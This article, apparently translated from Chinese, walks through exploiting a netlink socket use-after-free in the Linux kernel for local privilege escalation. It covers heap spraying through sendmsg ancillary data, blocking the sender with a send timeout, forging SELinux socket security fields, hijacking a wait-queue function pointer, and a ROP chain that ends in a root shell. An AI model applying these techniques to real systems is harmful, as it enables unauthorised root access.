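Preface
I previously came across a Chinese translation of the English analysis series on this vulnerability, but only the first two parts had been translated. When I worked through it myself, I also found that the original English articles have some significant problems and target a fairly old kernel version. I therefore switched to a kernel version line that is still in common use, tried to write an exp specific to it, and would like to share the result for discussion. This article is for study and exchange only; do not use it for anything illegal.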
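Doubly linked lists in the Linux kernel
Linux kernel driver development makes frequent use of the kernel's classic doubly linked list, list_head, together with its helper interfaces and macros: list_add, list_add_tail, list_del, list_for_each_entry, and so on.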
struct list_head {
struct list_head *next, *prev;
};
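Start by creating a list head, head_task, and initialize it with LIST_HEAD(head_task).
Once the head exists, create the first node and use list_add to insert this first_task node right after head_task.
By the same logic, every newly inserted node ends up immediately after head_task, and the nodes inserted earlier are pushed further back in order. The last node in the list is therefore the one that was inserted first. In short: earlier nodes sit toward the back and later nodes toward the front, i.e. first in, last out and last in, first out, much like a stack.
One point about the original illustration is easy to misread: a prev pointer points at the embedded list_head of the preceding node (the object that holds its next field), not at the orange header of the containing structure. All pointer operations stay within the embedded list member.
The rest is left for readers to study on their own.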
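The head-insertion behaviour described above can be checked in user space. The following is a minimal sketch, not the kernel's actual header: struct task, init_list_head() and id_at_position() are hypothetical names introduced only for this illustration, while list_add() and container_of() are re-implemented to behave like their kernel counterparts.

```c
#include <stddef.h>

/* Minimal user-space copy of the kernel's circular doubly linked list. */
struct list_head {
    struct list_head *next, *prev;
};

/* Recover the enclosing structure from a pointer to its embedded list_head. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

static void init_list_head(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

/* Same behaviour as the kernel's list_add(): insert right after head. */
static void list_add(struct list_head *entry, struct list_head *head)
{
    entry->next = head->next;
    entry->prev = head;
    head->next->prev = entry;
    head->next = entry;
}

/* Hypothetical payload type, used only for this illustration. */
struct task {
    int id;
    struct list_head list;
};

/* Insert tasks 1, 2, 3 in that order, then return the id found at the
 * given position when walking forward from the head (0 = first).
 * Returns -1 when the position is past the end of the list. */
static int id_at_position(int position)
{
    struct list_head head;
    struct task tasks[3];
    struct list_head *pos;
    int i;

    init_list_head(&head);
    for (i = 0; i < 3; i++) {
        tasks[i].id = i + 1;
        list_add(&tasks[i].list, &head);
    }

    pos = head.next;
    for (i = 0; i < position && pos != &head; i++)
        pos = pos->next;
    return pos == &head ? -1 : container_of(pos, struct task, list)->id;
}
```

Walking forward from the head visits the most recently inserted task first, which is the stack-like order described in the text. Note that every pointer stored in the list refers to an embedded list_head, never to the start of struct task.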
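slab memory allocation
Under the SLUB allocator, slab management is handled mainly by struct kmem_cache. The block sizes kmalloc can hand out start at 8 bytes and grow by powers of two up to the page-size range; note the two extra sizes, 96 and 192, that were added as an optimization. Each size has its own struct kmem_cache.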
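To make the size classes concrete, here is a small sketch that maps a request size to the cache size that would serve it. It is a simplified model rather than kernel code: kmalloc_bucket() is a hypothetical helper, and the 8-byte minimum and the 8192-byte upper bound are assumptions that depend on the architecture and kernel configuration.

```c
#include <stddef.h>

/* Return the object size of the general-purpose cache that would serve a
 * request of `size` bytes, or 0 if the request is outside the modelled range.
 * Assumptions: 8-byte minimum, 96- and 192-byte caches present, and 8192 as
 * the largest modelled cache. */
static size_t kmalloc_bucket(size_t size)
{
    size_t bucket = 8;

    if (size == 0 || size > 8192)
        return 0;
    /* The two non-power-of-two caches mentioned in the text. */
    if (size > 64 && size <= 96)
        return 96;
    if (size > 128 && size <= 192)
        return 192;
    /* Otherwise round up to the next power of two. */
    while (bucket < size)
        bucket <<= 1;
    return bucket;
}
```

Under these assumptions, any request between 513 and 1024 bytes is served from the 1024-byte cache, which is why objects of quite different sizes can end up competing for the same slabs.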
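Put simply, each CPU has its own struct kmem_cache_cpu, which has two members, page and partial.
page manages the memory this CPU allocates from first, and its free objects are tracked by freelist. When that slab fills up, the whole page is moved to full slabs, which the system manages globally, and partial hands one of its pages over to page.
If the number of objects in use in a page on partial drops below a certain threshold, the page is moved to the much larger nr of slabs set managed by struct kmem_cache_node. If usage in a page there drops below a further threshold, the system automatically releases that page.
Of course, when a CPU runs out of memory blocks, it pulls pages from nr of slabs into its partial member; if that is still not enough, the buddy system has to allocate a fresh large page.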
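Building the privilege-escalation exploit
From the PoC construction above, we already know where memory gets corrupted. The next step is to control the contents of that block of memory.
Pinning to a single CPU
First, under SLUB's allocation rules, different CPUs own different memory blocks, so we need to pin the program to a specific CPU from the very start to raise the odds of gaining control of that block.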
void migrate_to_cpu0() {
cpu_set_t set;
CPU_ZERO(&set); //clear the CPU set
CPU_SET(0,&set); //select CPU 0
//bind the current process to the selected CPU
if (sched_setaffinity(_getpid(), sizeof(set), &set) == -1){
perror("sched_setaffinity wrong");
exit(-1);
}
}
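Choosing a heap-spray primitive
Second, the block to be controlled is a struct sock. Because nlk_sk() casts it to a struct netlink_sock, and the function pointer we ultimately want to abuse also lives in struct netlink_sock, we should look at the size of struct netlink_sock. The pahole tool is used here.
struct netlink_sock is 1000 bytes in total, and even struct sock alone is 704 bytes. Both exceed 512 bytes, so they sit in the 1024-byte slab. We therefore need a relatively stable way to obtain a 1024-byte slab object whose contents we can fill in ourselves.
It turns out that after sendmsg() passes data into the kernel, the kernel function ___sys_sendmsg() briefly holds an ancillary-data block whose length and contents are both user-controlled (except for the first 16 bytes). However, it is freed before the function returns, so the process running it has to be blocked while it is still inside.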
static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
struct msghdr *msg_sys, unsigned int flags,
struct used_address *used_address,
unsigned int allowed_msghdr_flags)
{
struct compat_msghdr __user *msg_compat =
(struct compat_msghdr __user *)msg;
struct sockaddr_storage address;
struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
//sizeof(struct cmsghdr) is 16, so ctl is 36 bytes in total
unsigned char ctl[sizeof(struct cmsghdr) + 20]
__aligned(sizeof(__kernel_size_t));
/* 20 is size of ipv6_pktinfo */
[...]
//msg_sys and msg hold the same content in different memory
if (MSG_CMSG_COMPAT & flags)
err = get_compat_msghdr(msg_sys, msg_compat, NULL, &iov);
else
err = copy_msghdr_from_user(msg_sys, msg, NULL, &iov);
[...]
//the user-supplied msg_controllen must be <= INT_MAX
if (msg_sys->msg_controllen > INT_MAX)
goto out_freeiov;
//allowed_msghdr_flags is 0, so flags stays unchanged
flags |= (msg_sys->msg_flags & allowed_msghdr_flags);
//ctl_len equals the user-supplied msg_controllen
ctl_len = msg_sys->msg_controllen;
//MSG_CMSG_COMPAT turns out to be 0x80000000; with flags set to 0 we reach the else-if branch
if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
[...]
} else if (ctl_len) {
BUILD_BUG_ON(sizeof(struct cmsghdr) !=
CMSG_ALIGN(sizeof(struct cmsghdr)));
//the ancillary struct cmsghdr is normally only 16 bytes and grows only when more data follows it
if (ctl_len > sizeof(ctl)) {
//ctl_len, the size of the ancillary block, is controlled from user space; mind the limit in sock_kmalloc()
ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
if (ctl_buf == NULL)
goto out_freeiov;
}
err = -EFAULT;
/*
* Careful! Before this, msg_sys->msg_control contains a user pointer.
* Afterwards, it will be a kernel pointer. Thus the compiler-assisted
* checking falls down on this.
*/
//ctl_buf is filled from the user-space msg_control, i.e. the ancillary struct cmsghdr
if (copy_from_user(ctl_buf,
(void __user __force *)msg_sys->msg_control,
ctl_len))
goto out_freectl;
msg_sys->msg_control = ctl_buf;
}
msg_sys->msg_flags = flags;
[...]
err = sock_sendmsg(sock, msg_sys);
[...]
out_freectl:
//if the ancillary block was heap-allocated, it is freed here, so its lifetime is very short
if (ctl_buf != ctl)
sock_kfree_s(sock->sk, ctl_buf, ctl_len);
out_freeiov:
kfree(iov);
return err;
}
//cmsghdr looks like it has only a few members, but you can append a data area after it
struct cmsghdr {
__kernel_size_t cmsg_len; /* 0 8 */
int cmsg_level; /* 8 4 */
int cmsg_type; /* 12 4 */
/* size: 16, cachelines: 1, members: 3 */
/* last cacheline: 16 bytes */
};
The allocation goes through sock_kmalloc(), which enforces a limit tied to the system setting optmem_max. You can check the system's optmem_max with:
cat /proc/sys/net/core/optmem_max
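This route only works when the value is greater than 512, since a request has to exceed 512 bytes to be served from the 1024-byte slab.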
void *sock_kmalloc(struct sock *sk, int size, gfp_t priority)
{
//both this request and the running total (added up front to avoid a race) must stay within optmem_max, so not many objects can be sprayed
if ((unsigned int)size <= sysctl_optmem_max &&
atomic_read(&sk->sk_omem_alloc) + size < sysctl_optmem_max) {
void *mem;
/* First do the add, to avoid the race if kmalloc
* might sleep.
*/
atomic_add(size, &sk->sk_omem_alloc);
//allocate the block
mem = kmalloc(size, priority);
if (mem)
return mem;
atomic_sub(size, &sk->sk_omem_alloc);
}
return NULL;
}
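The two conditions in sock_kmalloc() put a ceiling on how many ancillary blocks one socket can hold at the same time. The sketch below models only that admission check in user space; sock_kmalloc_admits() and max_concurrent_allocs() are hypothetical helpers, and the value 20480 used in the usage note is an assumption (a common 64-bit default) that should be replaced with whatever /proc/sys/net/core/optmem_max reports.

```c
/* Model of the admission check in sock_kmalloc():
 * the request itself must fit within optmem_max, and the amount already
 * charged to the socket plus the request must stay strictly below it. */
static int sock_kmalloc_admits(unsigned int optmem_max,
                               unsigned int in_use,
                               unsigned int size)
{
    return size <= optmem_max && in_use + size < optmem_max;
}

/* Count how many blocks of `size` bytes can be outstanding on one socket
 * before the check starts to refuse further requests. */
static unsigned int max_concurrent_allocs(unsigned int optmem_max,
                                          unsigned int size)
{
    unsigned int in_use = 0;
    unsigned int count = 0;

    if (size == 0)
        return 0; /* avoid an endless loop on a meaningless request */
    while (sock_kmalloc_admits(optmem_max, in_use, size)) {
        in_use += size;
        count++;
    }
    return count;
}
```

With an assumed optmem_max of 20480, max_concurrent_allocs(20480, 1024) evaluates to 19, so the number of simultaneously blocked 1024-byte requests on a single socket has to stay below twenty.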
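Blocking the sending process
Next, blocking that process requires two things:
- Pick a suitable socket protocol that neither competes for 1024-byte objects nor touches the UAF block; AF_UNIX fits.
- Find a function that sets timeo so the process blocks for as long as possible; this is again setsockopt().
The original netlink socket flow is not reused, mainly because its netlink_getsockbyportid() function walks the members of nl_table, which could be fatal for the UAF block.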
static struct sock *netlink_getsockbyportid(struct sock *ssk, u32 portid)
{
struct sock *sock;
struct netlink_sock *nlk;
//the connected recv_fd is looked up here
sock = netlink_lookup(sock_net(ssk), ssk->sk_protocol, portid);
if (!sock)
return ERR_PTR(-ECONNREFUSED);
/* Don't bother queuing skb if kernel socket has no input function */
nlk = nlk_sk(sock);
if (sock->sk_state == NETLINK_CONNECTED &&
nlk->dst_portid != nlk_sk(ssk)->portid) {
sock_put(sock);
return ERR_PTR(-ECONNREFUSED);
}
return sock;
}
static struct sock *netlink_lookup(struct net *net, int protocol, u32 portid)
{
struct netlink_table *table = &nl_table[protocol];
struct sock *sk;
rcu_read_lock();
//search the hash table that belongs to this protocol
sk = __netlink_lookup(table, portid, net);
if (sk)
sock_hold(sk);
rcu_read_unlock();
return sk;
}
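In the AF_UNIX protocol, struct sockaddr_un is normally used. It contains only the members sun_family and sun_path. What is unusual is that its "port" is something like a file path, which makes it feel more like a shared-memory model. Setting the first byte of sun_path to 0 places the address in the abstract namespace, so there is no trouble with a path that cannot be found.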
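As an illustration of the leading-zero-byte convention, the following sketch fills in an abstract AF_UNIX address. make_abstract_addr() is a hypothetical helper written for this article, and it returns the exact address length, which is one possible choice rather than the only one.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Fill `addr` with an abstract-namespace address made of a leading '\0'
 * followed by `name`. Returns the length to pass to bind()/connect(),
 * or 0 if the name does not fit into sun_path. */
static socklen_t make_abstract_addr(struct sockaddr_un *addr, const char *name)
{
    size_t len = strlen(name);

    if (len > sizeof(addr->sun_path) - 1)
        return 0;
    memset(addr, 0, sizeof(*addr));
    addr->sun_family = AF_UNIX;
    /* sun_path[0] stays '\0': this marks the abstract namespace. */
    memcpy(addr->sun_path + 1, name, len);
    return (socklen_t)(offsetof(struct sockaddr_un, sun_path) + 1 + len);
}
```

Abstract names are compared byte for byte over the given length, so bind() and connect() must be called with the same length. Passing sizeof(struct sockaddr_un) on both sides also works, because the trailing zero bytes then simply become part of the name.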
//with this protocol, sendmsg ends up in this function
static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
size_t len)
{
struct sock *sk = sock->sk;
struct net *net = sock_net(sk);
struct unix_sock *u = unix_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_un *, sunaddr, msg->msg_name);
struct sock *other = NULL;
int namelen = 0; /* fake GCC */
int err;
unsigned int hash;
struct sk_buff *skb;
long timeo;
struct scm_cookie scm;
int max_level;
int data_len = 0;
int sk_locked;
wait_for_unix_gc();
//the checks inside this function have to be passed
err = scm_send(sock, msg, &scm, false);
if (err < 0)
return err;
err = -EOPNOTSUPP;
if (msg->msg_flags&MSG_OOB)
goto out;
if (msg->msg_namelen) {
err = unix_mkname(sunaddr, msg->msg_namelen, &hash);
if (err < 0)
goto out;
namelen = err;
} else {
sunaddr = NULL;
err = -ENOTCONN;
other = unix_peer_get(sk);
if (!other)
goto out;
}
if (test_bit(SOCK_PASSCRED, &sock->flags) && !u->addr
&& (err = unix_autobind(sock)) != 0)
goto out;
err = -EMSGSIZE;
if (len > sk->sk_sndbuf - 32)
goto out;
if (len > SKB_MAX_ALLOC) {
data_len = min_t(size_t,
len - SKB_MAX_ALLOC,
MAX_SKB_FRAGS * PAGE_SIZE);
data_len = PAGE_ALIGN(data_len);
BUILD_BUG_ON(SKB_MAX_ALLOC < PAGE_SIZE);
}
//the final checks and the blocking both happen in this function
skb = sock_alloc_send_pskb(sk, len - data_len, data_len,
msg->msg_flags & MSG_DONTWAIT, &err,
PAGE_ALLOC_COSTLY_ORDER);
[...]
}
static __inline__ int scm_send(struct socket *sock, struct msghdr *msg,
struct scm_cookie *scm, bool forcecreds)
{
[...]
//this time msg_controllen must be non-zero, so the checks in __scm_send() have to be passed
if (msg->msg_controllen <= 0)
return 0;
//continue into the checking function
return __scm_send(sock, msg, scm);
}
int __scm_send(struct socket *sock, struct msghdr *msg, struct scm_cookie *p)
{
struct cmsghdr *cmsg;
int err;
//the loop body runs only once; there is no second header, so the loop then exits
for_each_cmsghdr(cmsg, msg) {
err = -EINVAL;
/* Verify that cmsg_len is at least sizeof(struct cmsghdr) */
/* The first check was omitted in <= 2.2.5. The reasoning was
that parser checks cmsg_len in any case, so that
additional check would be work duplication.
But if cmsg_level is not SOL_SOCKET, we do not check
for too short ancillary data object at all! Oops.
OK, let's add it...
*/
//length check: cmsg_len must be >= 16 and <= the size of the whole ancillary block
if (!CMSG_OK(msg, cmsg))
goto error;
//cmsg_level must differ from SOL_SOCKET (1 on x86 Linux; 0xffff only on a few other architectures)
if (cmsg->cmsg_level != SOL_SOCKET)
continue;
[...]
}
[...]
return 0;
error:
scm_destroy(p);
return err;
}
//cmsg_len must be >= 16 and <= the size of the whole ancillary block
#define CMSG_OK(mhdr, cmsg) ((cmsg)->cmsg_len >= sizeof(struct cmsghdr) && \
(cmsg)->cmsg_len <= (unsigned long) \
((mhdr)->msg_controllen - \
((char *)(cmsg) - (char *)(mhdr)->msg_control)))
#define for_each_cmsghdr(cmsg, msg)
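The length check performed by CMSG_OK can be restated as a plain function, which makes the boundary cases easier to see. This is a user-space sketch under the assumption that only sizes and offsets matter; cmsg_ok() is a hypothetical name, and offset stands for the distance of the header from the start of the control buffer.

```c
#include <stddef.h>
#include <sys/socket.h>

/* Mirror of the CMSG_OK length check:
 *  - cmsg_len must cover at least the header itself, and
 *  - cmsg_len must not run past the end of the control buffer.
 * `offset` is where this header starts inside the control buffer. */
static int cmsg_ok(size_t cmsg_len, size_t controllen, size_t offset)
{
    if (offset > controllen)
        return 0; /* header would start outside the buffer */
    return cmsg_len >= sizeof(struct cmsghdr) &&
           cmsg_len <= controllen - offset;
}
```

A single header whose cmsg_len equals msg_controllen passes the check and leaves no room for a second header, which matches the comment above that the loop body runs only once.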
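The place where it can block is also unusual: inside sock_alloc_send_pskb(). This differs from netlink_attachskb() discussed earlier, which checks the receiver's sk_rcvbuf; here the sender's sk_sndbuf is checked. In the end it is skb_set_owner_w() that increases the accounted data size and so creates the precondition for blocking. Seen this way, the functions differ but the kernel's logic is consistent.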
struct sk_buff *sock_alloc_send_pskb(struct sock *sk, unsigned long header_len,
unsigned long data_len, int noblock,
int *errcode, int max_page_order)
{
struct sk_buff *skb;
long timeo;
int err;
//timeo is assigned here; if sk->sk_sndtimeo is non-zero, it becomes the blocking timeout
timeo = sock_sndtimeo(sk, noblock);
for (;;) {
err = sock_error(sk);
if (err != 0)
goto failure;
err = -EPIPE;
if (sk->sk_shutdown & SEND_SHUTDOWN)
goto failure;
//@sk_sndbuf: size of send buffer in bytes
//if the allocated write memory is still below sk_sndbuf, the loop exits and nothing blocks
if (sk_wmem_alloc_get(sk) < sk->sk_sndbuf)
break;
sk_set_bit(SOCKWQ_ASYNC_NOSPACE, sk);
set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
err = -EAGAIN;
if (!timeo)
goto failure;
if (signal_pending(current))
goto interrupted;
//blocking starts once execution gets here
timeo = sock_wait_for_wmem(sk, timeo);
}
skb = alloc_skb_with_frags(header_len, data_len, max_page_order,
errcode, sk->sk_allocation);
if (skb)
skb_set_owner_w(skb, sk);
return skb;
interrupted:
err = sock_intr_errno(timeo);
failure:
*errcode = err;
return NULL;
}
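We now know how unix_dgram_sendmsg() reaches the blocking code path. The remaining question is how to set timeo. Rather than depend on whatever value sk->sk_sndtimeo currently holds, the exploit sets it explicitly, again with setsockopt(). The main checks in that function were covered earlier, so here we focus on the checks specific to this option.
//level is SOL_SOCKET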
int sock_setsockopt(struct socket *sock, int level, int optname,
char __user *optval, unsigned int optlen)
{
struct sock *sk = sock->sk;
int val;
int valbool;
struct linger ling;
int ret = 0;
/*
* Options without arguments
*/
if (optname == SO_BINDTODEVICE)
return sock_setbindtodevice(sk, optval, optlen);
if (optlen < sizeof(int))
return -EINVAL;
if (get_user(val, (int __user *)optval))
return -EFAULT;
//there are many checks above, but they were analysed earlier and are not repeated here
valbool = val ? 1 : 0;
lock_sock(sk);
switch (optname) {
[...]
//when optname is SO_SNDTIMEO, timeo can be changed; keep tracing
case SO_SNDTIMEO:
ret = sock_set_timeout(&sk->sk_sndtimeo, optval, optlen);
break;
[...]
default:
ret = -ENOPROTOOPT;
break;
}
release_sock(sk);
return ret;
}
//the checks in here are a little convoluted, but zeroing the whole structure is a simple way through
static int sock_set_timeout(long *timeo_p, char __user *optval, int optlen)
{
struct timeval tv;
//optlen must not be smaller than sizeof(struct timeval)
if (optlen < sizeof(tv))
return -EINVAL;
//the user-space struct timeval must really exist and be readable
if (copy_from_user(&tv, optval, sizeof(tv)))
return -EFAULT;
//tv.tv_usec must be >= 0 and < USEC_PER_SEC
if (tv.tv_usec < 0 || tv.tv_usec >= USEC_PER_SEC)
return -EDOM;
//tv.tv_sec must be >= 0
if (tv.tv_sec < 0) {
static int warned __read_mostly;
*timeo_p = 0;
if (warned < 10 && net_ratelimit()) {
warned++;
pr_info("%s: `%s' (pid %d) tries to set negative timeout\n",
__func__, current->comm, task_pid_nr(current));
}
return 0;
}
//timeo_p is set to the maximum timeout
*timeo_p = MAX_SCHEDULE_TIMEOUT;
//if both fields are 0, return immediately
if (tv.tv_sec == 0 && tv.tv_usec == 0)
return 0;
if (tv.tv_sec < (MAX_SCHEDULE_TIMEOUT/HZ - 1))
*timeo_p = tv.tv_sec * HZ + DIV_ROUND_UP(tv.tv_usec, USEC_PER_SEC / HZ);
return 0;
}
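The conversion in sock_set_timeout() is easier to follow with concrete numbers. The sketch below re-implements only the arithmetic in user space; model_set_timeout() and the MODEL_ constants are hypothetical names, the tick rate is passed in as a parameter because HZ depends on the kernel configuration, and LONG_MAX stands in for MAX_SCHEDULE_TIMEOUT.

```c
#include <errno.h>
#include <limits.h>

#define MODEL_USEC_PER_SEC 1000000L
#define MODEL_MAX_SCHEDULE_TIMEOUT LONG_MAX /* stand-in for the kernel constant */

/* User-space model of the timeval-to-ticks conversion.
 * `hz` is the assumed tick rate (must be between 1 and 1000000).
 * Returns 0 on success or -EDOM for an out-of-range tv_usec. */
static int model_set_timeout(long *timeo, long tv_sec, long tv_usec, long hz)
{
    long usec_per_tick = MODEL_USEC_PER_SEC / hz;

    if (tv_usec < 0 || tv_usec >= MODEL_USEC_PER_SEC)
        return -EDOM;
    if (tv_sec < 0) {
        *timeo = 0; /* negative timeouts are turned into "do not wait" */
        return 0;
    }
    *timeo = MODEL_MAX_SCHEDULE_TIMEOUT;
    if (tv_sec == 0 && tv_usec == 0)
        return 0; /* an all-zero timeval means "wait without limit" */
    if (tv_sec < MODEL_MAX_SCHEDULE_TIMEOUT / hz - 1)
        *timeo = tv_sec * hz +
                 (tv_usec + usec_per_tick - 1) / usec_per_tick; /* round up */
    return 0;
}
```

With an assumed tick rate of 250, a timeval of one second becomes 250 ticks, while an all-zero timeval leaves the timeout at its maximum. That is why zeroing the structure is the simplest way to obtain the longest possible wait.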
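The material I found online treats this module as finished at this point, but when I actually debugged it I found one more protection that has to be bypassed. The kernels used in those write-ups are older than mine, so they may not have this protection.
This is not a real obstacle either: find the relevant functions and get past their checks one by one.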
SYSCALL_DEFINE5(setsockopt, int, fd, int, level, int, optname,
char __user *, optval, int, optlen)
{
int err, fput_needed;
struct socket *sock;
if (optlen < 0)
return -EINVAL;
sock = sockfd_lookup_light(fd, &err, &fput_needed);
if (sock != NULL) {
//this is a security check on the struct socket
err = security_socket_setsockopt(sock, level, optname);
if (err)
goto out_put;
if (level == SOL_SOCKET)
err =
sock_setsockopt(sock, level, optname, optval,
optlen);
else
err =
sock->ops->setsockopt(sock, level, optname, optval,
optlen);
out_put:
fput_light(sock->file, fput_needed);
}
return err;
}
//this is a kernel hook; step through it in gdb to see where it leads
int security_socket_setsockopt(struct socket *sock, int level, int optname)
{
return call_int_hook(socket_setsockopt, 0, sock, level, optname);
}
//gdb leads here; the main check is performed by sock_has_perm()
static int selinux_socket_setsockopt(struct socket *sock, int level, int optname)
{
int err;
//the check passes when err is 0
err = sock_has_perm(sock->sk, SOCKET__SETOPT);
if (err)
return err;
return selinux_netlbl_socket_setsockopt(sock, level, optname);
}
//the decision is based mainly on sk->sk_security in struct sock
static int sock_has_perm(struct sock *sk, u32 perms)
{
struct sk_security_struct *sksec = sk->sk_security;
struct common_audit_data ad;
struct lsm_network_audit net = {0,};
//SECINITSID_KERNEL is 1, so sksec->sid must be 1
if (sksec->sid == SECINITSID_KERNEL)
return 0;
ad.type = LSM_AUDIT_DATA_NET;
ad.u.net = &net;
ad.u.net->sk = sk;
return avc_has_perm(current_sid(), sksec->sid, sksec->sclass, perms,
&ad);
}
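//its header is not available to user space, so the exploit code has to define a matching structure and fill it in; unused struct pointers can be replaced with void *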
struct sk_security_struct {
#ifdef CONFIG_NETLABEL
enum { /* NetLabel state */
NLBL_UNSET = 0,
NLBL_REQUIRE,
NLBL_LABELED,
NLBL_REQSKB,
NLBL_CONNLABELED,
} nlbl_state;
struct netlbl_lsm_secattr *nlbl_secattr; /* NetLabel sec attributes */
#endif
u32 sid; /* SID of this object */
u32 peer_sid; /* SID of peer */
u16 sclass; /* sock security class */
};
//this check passes as long as sksec->nlbl_state is 0
int selinux_netlbl_socket_setsockopt(struct socket *sock,
int level,
int optname)
{
int rc = 0;
struct sock *sk = sock->sk;
struct sk_security_struct *sksec = sk->sk_security;
struct netlbl_lsm_secattr secattr;
if (selinux_netlbl_option(level, optname) &&
(sksec->nlbl_state == NLBL_LABELED ||
sksec->nlbl_state == NLBL_CONNLABELED)) {
netlbl_secattr_init(&secattr);
lock_sock(sk);
/* call the netlabel function directly as we want to see the
* on-the-wire label that is assigned via the socket's options
* and not the cached netlabel/lsm attributes */
rc = netlbl_sock_getattr(sk, &secattr);
release_sock(sk);
if (rc == 0)
rc = -EACCES;
else if (rc == -ENOMSG)
rc = 0;
netlbl_secattr_destroy(&secattr);
}
return rc;
}
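Forging the wait queue
Looking at struct netlink_sock, the part that extends beyond sock contains a wait-queue member, wait_queue_head_t wait. It determines whether a task joins the wait queue and how it is woken up, as briefly described earlier.
The exp needs a controllable function pointer, and a wait-queue entry conveniently has a func member that is exactly that; as mentioned above, wake-up goes through it. So when refilling the memory that used to hold the struct sock, we forge wait-queue data at the corresponding offset so that it refers to a wait_queue_t in user space, fill that wait_queue_t's func member with a fake value, and finally trigger a wake-up of this forged wait-queue entry.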
struct netlink_sock {
/* struct sock has to be the first member of netlink_sock */
struct sock sk;
u32 portid;
u32 dst_portid;
u32 dst_group;
u32 flags;
u32 subscriptions;
u32 ngroups;
unsigned long *groups;
unsigned long state;
size_t max_recvmsg_len;
wait_queue_head_t wait;
bool bound;
bool cb_running;
struct netlink_callback cb;
struct mutex *cb_mutex;
struct mutex cb_def_mutex;
void (*netlink_rcv)(struct sk_buff *skb);
int (*netlink_bind)(struct net *net, int group);
void (*netlink_unbind)(struct net *net, int group);
struct module *module;
struct rhash_head node;
struct rcu_head rcu;
struct work_struct work;
};
//doubly linked list built on list_head
struct __wait_queue_head {
spinlock_t lock;
struct list_head task_list;
};
typedef struct __wait_queue_head wait_queue_head_t;
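The layout of list_head and how list_add inserts nodes were covered at the start of the article. On wake-up the wait queue is traversed with list_for_each_entry_safe(), so the struct list_head in both the head and the node must be constructed carefully.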
typedef struct __wait_queue wait_queue_t;
struct __wait_queue {
unsigned int flags;
void *private;
//the function pointer that needs to be controlled
wait_queue_func_t func;
struct list_head task_list;
};
static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
int nr_exclusive, int wake_flags, void *key)
{
wait_queue_t *curr, *next;
list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
unsigned flags = curr->flags;
if (curr->func(curr, mode, wake_flags, key) &&
//the entry's flags must have WQ_FLAG_EXCLUSIVE (1) set, and no other task may be left to wake
(flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
break;
}
}
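The traversal in __wake_up_common() can be modelled in user space to see when the loop stops. This is a simplified sketch, not kernel code: the callback takes a single argument instead of four, and struct wait_entry, wake_up_model(), count_call() and callbacks_run() are hypothetical names introduced for the illustration.

```c
#include <stddef.h>

#define WQ_FLAG_EXCLUSIVE 0x01

struct list_head {
    struct list_head *next, *prev;
};

struct wait_entry;
typedef int (*wait_func_t)(struct wait_entry *entry);

/* Simplified wait-queue entry: flags, callback, embedded list node. */
struct wait_entry {
    unsigned int flags;
    wait_func_t func;
    struct list_head task_list;
};

#define entry_of(ptr) \
    ((struct wait_entry *)((char *)(ptr) - offsetof(struct wait_entry, task_list)))

static int calls; /* number of callbacks invoked by the last wake-up */

static int count_call(struct wait_entry *entry)
{
    (void)entry;
    calls++;
    return 1; /* report a successful wake-up */
}

static void list_add_tail(struct list_head *entry, struct list_head *head)
{
    entry->prev = head->prev;
    entry->next = head;
    head->prev->next = entry;
    head->prev = entry;
}

/* Walk the queue like __wake_up_common(): call every entry's func and stop
 * once nr_exclusive exclusive entries have been woken successfully. */
static void wake_up_model(struct list_head *queue, int nr_exclusive)
{
    struct list_head *pos, *next;

    for (pos = queue->next; pos != queue; pos = next) {
        struct wait_entry *curr = entry_of(pos);
        unsigned int flags = curr->flags;

        next = pos->next; /* saved before the callback, like the _safe iterator */
        if (curr->func(curr) && (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
            break;
    }
}

/* Queue up to four entries with the given flags, wake with nr_exclusive = 1,
 * and return how many callbacks ran. */
static int callbacks_run(int n, unsigned int flags)
{
    struct list_head queue;
    struct wait_entry entries[4];
    int i;

    queue.next = queue.prev = &queue;
    for (i = 0; i < n && i < 4; i++) {
        entries[i].flags = flags;
        entries[i].func = count_call;
        list_add_tail(&entries[i].task_list, &queue);
    }
    calls = 0;
    wake_up_model(&queue, 1);
    return calls;
}
```

With non-exclusive entries every callback runs, whereas with exclusive entries and nr_exclusive set to 1 the walk ends after the first successful callback. This is the reason the flags field matters as much as the list pointers when the traversal must not continue past a single entry.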
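Building the ROP chain
So far we control only a single function pointer, which is far from enough to control the stack and lay out a ROP chain. There is a small trick here, covered in many articles: exchange esp with eXx (some 32-bit register) to pivot the stack to the value held in eXx. The advantage is that after the exchange rsp contains only the low 32 bits, which clearly falls in user space, so as long as the SMAP protection is bypassed we control it ourselves. Before that there is one more step: working out which eXx can actually be controlled.
I initialized the user-space struct wait_queue_t with 0xac. When execution reaches curr->func(curr, mode, wake_flags, key), the registers clearly show that RAX holds the address of the struct wait_queue_t I built, so the low 32 bits of that address give the start of the new stack.
After that, ROPgadget can be used to collect gadgets; it is best to dump all of them into a file in one go: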
ROPgadget --binary vmlinux > gadget
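Next, build the ROP chain. Unlike a user-space chain, we are now running in kernel mode (ring0), and after commit_creds(prepare_kernel_cred(0)) we have to return properly before anything can run in user space. Combining the swapgs instruction, which swaps GS, with the iretq instruction, which returns from an interrupt, takes execution from ring0 back to ring3. Finally, note that the pop rbp following swapgs needs to be given a readable user-space address, otherwise the program may page-fault.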
| ROP chain, in stack order |
|---|
| pop rdi; ret |
| NULL |
| addr of prepare_kernel_cred() |
| pop rdx; ret |
| addr of commit_creds() |
| mov rdi, rax; call rdx |
| swapgs; pop rbp; ret |
| valid user-space address |
| iretq |
| system("/bin/sh") |
| CS |
| EFLAGS |
| RSP |
| SS |
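A problem came up here: ROPgadget did find an iretq gadget, but the exp would not run with it. Debugging in gdb showed that the instruction actually present at that address was not the expected one, possibly because the code at that address changes at run time.
So I first used pwntools to get the hexadecimal encoding of the instruction for the target environment.
Then I searched for that encoding in IDA Pro; because of little-endian byte order, the bytes are entered in reversed order for the search.
Finally, I picked an address among the results that does not change at run time, used it in the ROP chain, and it succeeded.
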